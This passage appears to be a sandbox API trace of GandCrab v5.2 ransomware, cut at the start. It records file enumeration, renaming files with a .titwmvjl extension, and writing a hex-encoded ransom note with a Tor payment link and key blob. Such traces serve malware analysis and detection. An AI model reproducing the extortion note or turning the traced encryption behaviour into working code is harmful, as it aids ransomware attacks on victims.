param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\d2ca4a09d2ca4deb61a.lock") returned 65 [0096.137] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2b4 [0096.137] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.137] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.137] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\Microsoft\\") returned 41 [0096.137] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\*") returned="C:\\Users\\Default\\AppData\\Local\\Microsoft\\*" [0096.137] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\*", fInfoLevelId=0x1, lpFindFileData=0x259effc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259effc) returned 0x503478 [0096.138] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0096.138] FindNextFileW (in: hFindFile=0x503478, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0096.138] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0096.138] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0096.138] FindNextFileW (in: hFindFile=0x503478, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0096.138] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0096.138] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0096.138] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\Default\\AppData\\Local\\Microsoft\\d2ca4a09d2ca4deb61a.lock" [0096.138] lstrlenW (lpString=".titwmvjl") returned 9 [0096.138] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\Microsoft\\d2ca4a09d2ca4deb61a.lock") returned 65 [0096.138] VirtualAlloc (lpAddress=0x0, dwSize=0xc2, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.139] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 74 [0096.139] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\Microsoft\\d2ca4a09d2ca4deb61a.lock") returned 65 [0096.139] lstrlenW (lpString=".lock") returned 5 [0096.139] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.139] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0096.139] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.139] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.139] FindNextFileW (in: hFindFile=0x503478, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0096.139] lstrcmpW (lpString1="InputPersonalization", lpString2=".") returned 1 [0096.139] lstrcmpW (lpString1="InputPersonalization", lpString2="..") returned 1 [0096.139] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\", lpString2="InputPersonalization" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization") returned="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization" [0096.139] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization", lpString2="\\" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\") returned="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\" [0096.139] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0096.140] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.140] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0096.140] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.140] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0096.140] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.140] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0096.140] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.140] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0096.140] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.141] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.141] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\\\TITWMVJL-DECRYPT.txt") returned 83 [0096.141] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\inputpersonalization\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0096.142] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39